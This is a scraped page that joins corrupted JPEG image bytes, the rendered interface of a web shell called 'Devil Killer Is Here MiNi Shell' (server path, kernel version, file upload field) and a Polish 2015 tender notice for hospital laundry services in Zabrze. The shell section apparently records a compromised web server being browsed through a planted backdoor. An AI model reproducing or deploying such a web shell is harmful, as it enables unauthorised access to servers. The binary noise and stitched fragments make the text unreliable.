JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151006/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151006/263022-N-2015.html

<p class="kh_header"><b>Zabrze: Świadczenie usług w zakresie prania bielizny szpitalnej. 
Sygnatura postępowania DZP/12PN/2015</b><br>
<b>Numer ogłoszenia: 263022 - 2015; data zamieszczenia: 06.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny w Zabrzu Sp. z o.o. , ul. M. C. Skłodowskiej 10, 41-800 Zabrze, woj. śląskie, tel. 032 3732308, 3732346, faks 032 3732308, 3732346.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.klinika-zabrze.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie prania bielizny szpitalnej. 
Sygnatura postępowania DZP/12PN/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Świadczenie usług w zakresie prania bielizny szpitalnej 
Sygnatura postępowania DZP/12PN/2015
Przedmiot zamówienia obejmuje: odbiór brudnej bielizny wraz z załadunkiem, transport, pranie, dezynfekowanie oraz suszenie, maglowanie lub prasowanie bielizny, przywóz czystej bielizny wraz z wyładunkiem w następujących rodzajach:
 A)  bielizna pościelowa z oddziałów szpitalnych: powłoki, prześcieradła, powłoczki, poszwy, podkłady,
 B)  bielizna operacyjna: prześcieradła, chusty, podkłady, serwetki, koszule chirurgiczne,
 C)  odzież operacyjna: bluzy, spodnie, fartuchy i odzież operacyjna barierowa,
 D)  odzież ochronna personelu medycznego: sukienki, bluzy i spodnie lekarskie, spódnice, fartuchy,
 E)  odzież ochronna personelu technicznego - warsztatu,
 F)  pozostałe: szlafroki, koszule, piżamy, ręczniki bawełniane, ręczniki z frotte, koce, kapcie, parawany, obrusy  i pokrowce na aparaturę medyczną, worki na pościel i pieczywo, zasłony, rolety, firany, mopy,  kołdry anilana, poduszki, materace pokrowce na materace, w miarę potrzeby bielizna osobista pacjentów, nosze, chodniki dywanowo-gumowe, fartuchy ołowiane (z zachowaniem odpowiednich zasad) oraz inne wynikające z potrzeb Zamawiającego.
Świadczenie usług w zakresie prania bielizny szpitalnej w ilości ok. 5500 kg miesięcznie, ok. 66 000 kg rocznie (okres umowy 2 lata czyli około 132 000 kg) 
XII. 2.	Warunki przedmiotowe wymagane od Wykonawców - Wykonawcy składający ofertę w postępowaniu oświadczają, że zobowiązują się do przestrzegania poniższych wymagań:
1)	Używanie preparatów piorących i dezynfekcyjnych, biobójczych przeznaczonych do stosowania w placówkach służby zdrowia spełniających wymagania w rozumieniu Ustawy z dnia 20.05.2010 r. o wyrobach medycznych (Dz. U. z 2010 r., 107, poz. 679) i posiadających pozwolenie, o którym mowa w ustawie o produktach biobójczych (tekst jednolity Dz. U. z 2007 r., Nr 39, poz. 252 z późn. zm.),  posiadających oznaczenie wyrobu znakiem CE dla którego wystawiono Deklarację Zgodności oraz Kartę Charakterystyki Preparatu Niebezpiecznego (jeżeli dotyczy).
2)	Pralnia musi posiadać nowoczesny park maszynowy z automatycznym systemem dozującym środki piorące i dezynfekujące.
3)	Zapewnienie transportu na koszt Wykonawcy. 
4)	Świadczenie usług we wszystkie dni kalendarzowe, za wyjątkiem niedziel i pierwszych dni świąt, przy czym jeżeli niedziela i pierwszy dzień świąt następują kolejno po sobie, tylko pierwszy z nich uznaje się za dzień wolny. Odbiór i dostawa bielizny odbywać się będzie codziennie w godzinach od 6.30 do 7.00, a dodatkowo obowiązkowy codzienny odbiór brudnej bielizny w godzinach od 14.00 do 15.00 w wyznaczonym przez Zamawiającego miejscach.
5)	Dostarczanie czystej bielizny do wyznaczonych przez Zamawiającego miejsc w ciągu 24 godzin licząc od chwili odebrania brudnej partii (pościel) w godzinach rannych, w ciągu 72 godzin - materace, w ciągu 48 godzin mundurki, fartuchy oraz garsonki.
6)	Wykonawca pakuje bieliznę w worki foliowe, a następnie dodatkowo szczelnie zapakowuje w folię z zachowaniem segregacji na poszczególne komórki organizacyjne (worki opisane). Odzież ochronna taka jak mundurki (garsonki), fartuchy mają być prasowane i pakowane na wieszakach umieszczonych w wózku do tego celu wyznaczonym, kompletami w worki opisane zgodnie ze wskazaną komórką organizacyjną.
7)	Pranie bielizny szpitalnej i operacyjnej zgodnie z zaleceniami PZH, tzn. z pełną dezynfekcją chemiczno-termiczną. 
8)	Dokonywanie minimum raz w miesiącu na koszt Wykonawcy badań na czystość mikrobiologiczną wypranej bielizny i do 30-ego każdego miesiąca dostarczenie kopii wyniku badania Pielęgniarce Epidemiologicznej zatrudnionej u Zamawiającego.
9)	Stosowanie indywidualnego cyklu pralniczego dla bielizny z oddziału dermatologicznego, sal operacyjnych, tzn. Wykonawca musi posiadać wydzielone maszyny pralnicze wyłącznie do prania bielizny o wysokim reżimie sanitarnym.
10)	Zamawiający zastrzega sobie możliwość przeprowadzenia kontroli w pralni.
11)	Wykonawca dostarczy na koszt własny worki wykonane z materiałów barierowych z możliwością zawiązywania (zamknięcia) do transportu bielizny brudnej i skażonej w ilości 250 sztuk o objętości 120 litrów ?10%. 
12)	Zamawiający deklaruje pakowanie bielizny skażonej w worki wykonane z materiałów barierowych, a bieliznę brudną w worki wykonane z materiałów barierowych innego koloru niż worki bielizny skażonej.
13)	Termin płatności - wartość punktowana zgodnie z zapisami SIWZ cz. XXIV. Maksymalny termin płatności to 60 dni, natomiast najkrótszy termin płatności 30 dni od dnia otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT 
14)	Podpisanie umowy, której wzór stanowi załącznik nr 4 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wpłaty wadium w wysokości 5 720,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia warunku wskazanego w części XII.1.a tj. posiadania uprawnień do wykonania określonej działalności, ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów:
- Aktualnej opinii/ zezwolenia/ decyzji lub innego dokumentu Państwowego Powiatowego Inspektora Sanitarnego, potwierdzający, że pralnia podlega stałemu nadzorowi na zasadach określonych ustawą o Państwowej Inspekcji Sanitarnej (Dz. U. Nr 2011 nr 212, poz. 1263, oraz Dz. U. z 2012r. poz. 892), a Wykonawca posiada infrastrukturę niezbędną do świadczenia usług będących przedmiotem zamówienia na rzecz jednostek służby zdrowia zgodnie z obowiązującymi przepisami prawa oraz opisem przedmiotu zamówienia dotyczącym stanu sanitarnego pomieszczeń pralni, środków transportu bielizny i odzieży szpitalnej oraz zaopatrzenia w środki piorące, o których mowa w części XIII ust. 1 pkt 6 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia warunku wskazanego w części XII.1.b tj. posiadania wiedzy i doświadczenia, ocena spełnienia warunku nastąpi na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należy wykazać co najmniej 2 usługi, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia tzn. każda usługa prania bielizny szpitalnej w ilości ok. 50 000 kg rocznie o wartości brutto nie mniejszej niż 140 000 zł rocznie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  usługi zostały wykonane oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie, o którym mowa w cz. XIII pkt 1 pkt 5 SIWZ, z wykorzystaniem wzoru stanowiącego załącznik nr 6 do SIWZ. 
Dowodami potwierdzającymi należyte wykonanie usług mogą być m.in. poświadczenia, z zastrzeżeniem, że w przypadku nadal wykonywanych usług poświadczenie musi być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. Jedynie jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia w przypadku usług wystarczającym jest oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia warunku wskazanego w części XII.1.c tj. potencjału technicznego, ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
- wykazu środków transportów wykorzystywanych do realizacji zamówienia dopuszczonych do przewozu bielizny i odzieży szpitalnej wraz z podstawą dysponowania tymi środkami oraz opiniami/ decyzjami/ zaświadczeniami sanitarnymi potwierdzającymi, że środki transportu, wykorzystywane do realizacji zamówienia dopuszczone są do przewozu bielizny i odzieży szpitalnej, wydane przez odpowiednie służby sanitarno-epidemiologiczne wraz z informacją o podstawie dysponowania tymi zasobami zgodnie z załącznikiem nr 7 do SIWZ, o których mowa w części XIII ust. 1 pkt. 7 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie. W zakresie spełnienia warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych ocena ich spełnienia nastąpi na podstawie oświadczenia, o którym mowa w części XIII pkt. 1 ppkt 2 SIWZ tj. oświadczenie do postępowania o zamówienie publiczne z art. 22 ust. 1 ustawy - z wykorzystaniem wzoru stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia warunku wskazanego w części XII.1.d tj. sytuacji ekonomicznej i finansowej, ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż:140 000 zł, o których mowa w części XIII ust. 1 pkt. 8 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">9)	osobne wykazy wszystkich środków:
- piorących
- dezynfekujących/ biobójczych,
 jakich Wykonawca zamierza używać do wykonania zamówienia. Wykazy zgodne z załącznikami 3 i 3A do SIWZ.
10)	 aktualne dokumenty dopuszczające oferowane środki piorące i dezynfekcyjne do stosowania w placówkach służby zdrowia spełniających wymagania w rozumieniu Ustawy z dnia 20.05.2010 r. o wyrobach medycznych (Dz. U. z 2010 r., 107, poz. 679), posiadających oznaczenie wyrobu znakiem CE dla którego wystawiono Deklarację Zgodności oraz Kartę Charakterystyki Preparatu Niebezpiecznego (jeżeli dotyczy).
11)	aktualne dokumenty dopuszczające oferowane środki dezynfekcyjne- biobójcze do stosowania w placówkach służby zdrowia spełniających wymagania i posiadających pozwolenie, o którym mowa w ustawie o produktach biobójczych (tekst jednolity Dz. U. z 2007 r., Nr 39, poz. 252 z późn. zm.) - aktualne na dzień składania ofert oraz posiadających Kartę Charakterystyki Produktu Niebezpiecznego. 
12)	karty charakterystyki dla wszystkich środków zawartych w wykazach używanych do realizacji zamówienia.
13)	pozytywna opinia Centrum Zdrowia Dziecka lub innej równoważnej instytucji dla środków do prania bielizny noworodkowej, niemowlęcej i dziecięcej.
14)	opracowane procedury:
- przyjmowania, transportu bielizny,
- prania i dezynfekcji całego asortymentu podlegającemu usłudze (w tym opis warunków prania, stosowanych środków, zakresu temperatur i czasu ich stosowania),
- czyszczenia i dezynfekcji całego wyposażenia, powierzchni, pomieszczeń pralni,
- higieny pracowników pralni</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy oraz braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 Ustawy, oraz w celu potwierdzenia, że zaoferowany przedmiot zamówienia spełnia wymagania Zamawiającego, Zamawiający żąda następujących dokumentów:

1. Dokumenty wymagane
1)	oryginał lub kopia, poświadczona przez Wykonawcę za zgodność z oryginałem aktualnego odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
2)	oświadczenie do postępowania o zamówienie publiczne z art. 22 ust. 1 ustawy - z wykorzystaniem wzoru stanowiącego załącznik nr 2 do SIWZ, 
3)	oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w z art. 24 ust. 1 ustawy - z wykorzystaniem wzoru stanowiącego załącznik nr 5 do SIWZ,
4)	oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w z art. 24 ust. 2 pkt. 5 ustawy - z wykorzystaniem wzoru stanowiącego załącznik nr 5A do SIWZ (lista podmiotów należących do tej samej grupy kapitałowej),
5)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należy wykazać co najmniej 2 usługi, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia tzn. każda usługa prania bielizny szpitalnej w ilości ok. 50.000 kg rocznie o wartości brutto nie mniejszej niż 140 000 zł rocznie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  usługi zostały wykonane oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie - z wykorzystaniem wzoru stanowiącego załącznik nr 6 do SIWZ. 
Dowodami potwierdzającymi należyte wykonanie usług mogą być m.in. poświadczenia, z zastrzeżeniem, że w przypadku nadal wykonywanych usług poświadczenie musi być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. Jedynie jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia w przypadku usług wystarczającym jest oświadczenie Wykonawcy;
6)	aktualna opinia/ zezwolenia/ decyzja lub inny dokument Państwowego Powiatowego Inspektora Sanitarnego, potwierdzający, że pralnia podlega stałemu nadzorowi na zasadach określonych ustawą o Państwowej Inspekcji Sanitarnej (Dz. U. Nr 2011 nr 212, poz. 1263, oraz Dz. U. z 2012r. poz. 892), a Wykonawca posiada infrastrukturę niezbędną do świadczenia usług będących przedmiotem zamówienia na rzecz jednostek służby zdrowia zgodnie z obowiązującymi przepisami prawa oraz opisem przedmiotu zamówienia dotyczącym stanu sanitarnego pomieszczeń pralni, środków transportu bielizny i odzieży szpitalnej oraz zaopatrzenia w środki piorące,
7)	wykaz środków transportu wraz z opiniami/ decyzjami/ zaświadczeniami sanitarnymi potwierdzającymi, że środki transportu, wykorzystywane do realizacji zamówienia dopuszczone są do przewozu bielizny i odzieży szpitalnej, wydane przez odpowiednie służby sanitarno-epidemiologiczne wraz z informacją o podstawie dysponowania tymi zasobami zgodnie z załącznikiem nr 7 do SIWZ;
8)	opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca/ inny podmiot (dotyczy art. 26 ust. 2b ustawy pzp) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 140 000 zł;
9)	osobne wykazy wszystkich środków:
- piorących
- dezynfekujących/ biobójczych,
 jakich Wykonawca zamierza używać do wykonania zamówienia. Wykazy zgodne z załącznikami 3 i 3A do SIWZ.
10)	 aktualne dokumenty dopuszczające oferowane środki piorące i dezynfekcyjne do stosowania w placówkach służby zdrowia spełniających wymagania w rozumieniu Ustawy z dnia 20.05.2010 r. o wyrobach medycznych (Dz. U. z 2010 r., 107, poz. 679), posiadających oznaczenie wyrobu znakiem CE dla którego wystawiono Deklarację Zgodności oraz Kartę Charakterystyki Preparatu Niebezpiecznego (jeżeli dotyczy)
11)	aktualne dokumenty dopuszczające oferowane środki dezynfekcyjne- biobójcze do stosowania w placówkach służby zdrowia spełniających wymagania i posiadających pozwolenie, o którym mowa w ustawie o produktach biobójczych (tekst jednolity Dz. U. z 2007 r., Nr 39, poz. 252 z późn. zm.) - aktualne na dzień składania ofert oraz posiadających Kartę Charakterystyki Produktu Niebezpiecznego 
